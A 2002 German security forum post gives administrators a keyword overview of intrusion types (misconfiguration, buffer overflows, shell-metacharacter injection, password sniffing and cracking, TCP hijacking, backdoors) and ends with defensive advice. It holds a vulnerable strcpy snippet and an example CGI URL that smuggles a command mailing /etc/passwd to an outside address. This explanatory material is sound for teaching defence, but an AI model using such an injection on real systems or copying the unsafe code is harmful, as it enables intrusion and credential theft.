[HaBo]

**throjan** · 18.07.02, 14:42

"Wie mache ich einen Rechner im Internet auf?"
====================================

Penetrationsmöglichkeiten
-------------------------

<> Klassen von Penetrationen:
- - - - - - - - - - - - - - - - -

- Fehlkonfiguration, nicht abgeschaltete Dienste
- Die größte einzelne Ursache für Einbrüche
- Auch: Sicherheitspatches des Herstellers nicht eingespielt
- Meistens unnötige Dienste nicht abgeschaltet
- Firewall(s)- und Routerkonfigurationen fehlerhaft
- SMTP Relaying nicht abgeschaltet (Spam)
- Inhärent unsichere Dienste (NFS, NIS, telnet, rlogin)

- Buffer Overflow

void bla(char *s) { char buf[100]; strcpy(buf,s); }

- Sehr häufiger Fehler!
- Teilweise auch in Library-Funktionen ( z.B. syslog() )
- MS Exchange, wu-ftpd. Netscape, MSIE, sendmail, Outlook, Outlook Express, MS IIS, ...

- Metazeichen nicht escaped

http://www.site.com/search.cgi?what=bla;mail+/etc/passwd+me@here.com

- Wenn /bin/sh involviert ist ( system() ), müssen alle Metazeichen entfernt werden!
- Sendmail, Excite personal search extension, metamail, ...
- Whitelisten, nicht blacklisten
- Sehr viele Freeware-CGI-Perlscripte
- ::$DATA bei NT-Servern

- Passwörter gesnifft
- telnet
- Beliebte Ziele sind auch POP3 und IMAP, weil die gewöhnlich periodisch die
Paßwörter über das Netz broadcasten.

- Passwörter gecrackt
- Viele Fehler erlauben nicht, remote Code aus root auszuführen, aber man kann
damit /etc/passwd (oder die NIS-Map) lesen. Das reicht für einen Wörterbuchangriff auf die Passwort-Liste.
- Der empfohlene Password-Cracker ist "John the Ripper"

- TCP-Hijacking
Man kann auf der Route einer TCP-Verbindung die Verbindung übernehmen,
was besonders bei One-Time-Password schemas vorteilhaft benutzt werden kann, um die
authentifizierte Verbindung zu übernehmen.

- Hintertüren
In letzter Zeit sind Hintertüren vor allem bei Routern aufgetaucht, aber
historisch gibt es sie auch in Form von Trojanischen Pferden (Back Orifice, Netbus)
und von frühen Unix- und VMS-Versionen gibt es auch Anekdoten.

<> Wie schützt man sich?
- - - - - - - - - - - - -

- Nicht auf die Firewall verlassen. Hosts zusätzlich absichern.
- Verbindungen verschlüsseln, ssh einsetzen
- Ständig Scans auf die Rechner machen
- open Source hilft gegen offensichtliche Hintertüren
- Keine Microsoft-Produkte einsetzen
- Passwörter periodisch selbst zu cracken versuchen

? HaBo-Security

Anzeige

- Anzeige -

18.07.02, 14:42	#1 (permalink)
throjan Administrator Registriert seit: 25.09.01 Likes: 133	Penetration -- Ein Stichwortüberblick für Administratoren Anzeige "Wie mache ich einen Rechner im Internet auf?" ==================================== Penetrationsmöglichkeiten ------------------------- <> Klassen von Penetrationen: - - - - - - - - - - - - - - - - - - Fehlkonfiguration, nicht abgeschaltete Dienste - Die größte einzelne Ursache für Einbrüche - Auch: Sicherheitspatches des Herstellers nicht eingespielt - Meistens unnötige Dienste nicht abgeschaltet - Firewall(s)- und Routerkonfigurationen fehlerhaft - SMTP Relaying nicht abgeschaltet (Spam) - Inhärent unsichere Dienste (NFS, NIS, telnet, rlogin) - Buffer Overflow void bla(char s) { char buf[100]; strcpy(buf,s); }* - Sehr häufiger Fehler! - Teilweise auch in Library-Funktionen ( z.B. syslog() ) - MS Exchange, wu-ftpd. Netscape, MSIE, sendmail, Outlook, Outlook Express, MS IIS, ... - Metazeichen nicht escaped http://www.site.com/search.cgi?what=bla;mail+/etc/passwd+me@here.com - Wenn /bin/sh involviert ist ( system() ), müssen alle Metazeichen entfernt werden! - Sendmail, Excite personal search extension, metamail, ... - Whitelisten, nicht blacklisten - Sehr viele Freeware-CGI-Perlscripte - ::$DATA bei NT-Servern - Passwörter gesnifft - telnet - Beliebte Ziele sind auch POP3 und IMAP, weil die gewöhnlich periodisch die Paßwörter über das Netz broadcasten. - Passwörter gecrackt - Viele Fehler erlauben nicht, remote Code aus root auszuführen, aber man kann damit /etc/passwd (oder die NIS-Map) lesen. Das reicht für einen Wörterbuchangriff auf die Passwort-Liste. - Der empfohlene Password-Cracker ist "John the Ripper" - TCP-Hijacking Man kann auf der Route einer TCP-Verbindung die Verbindung übernehmen, was besonders bei One-Time-Password schemas vorteilhaft benutzt werden kann, um die authentifizierte Verbindung zu übernehmen. - Hintertüren In letzter Zeit sind Hintertüren vor allem bei Routern aufgetaucht, aber historisch gibt es sie auch in Form von Trojanischen Pferden (Back Orifice, Netbus) und von frühen Unix- und VMS-Versionen gibt es auch Anekdoten. <> Wie schützt man sich? - - - - - - - - - - - - - - Nicht auf die Firewall verlassen. Hosts zusätzlich absichern. - Verbindungen verschlüsseln, ssh einsetzen - Ständig Scans auf die Rechner machen - open Source hilft gegen offensichtliche Hintertüren - Keine Microsoft-Produkte einsetzen - Passwörter periodisch selbst zu cracken versuchen ? HaBo-Security Tiggerentchen likes this.

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Perfecte Befehlsrefernz für Administratoren oder Interessierte	Da Psydonym	Windows	1	14.08.02 21:11

[HaBo]

Penetration -- Ein Stichwortüberblick für Administratoren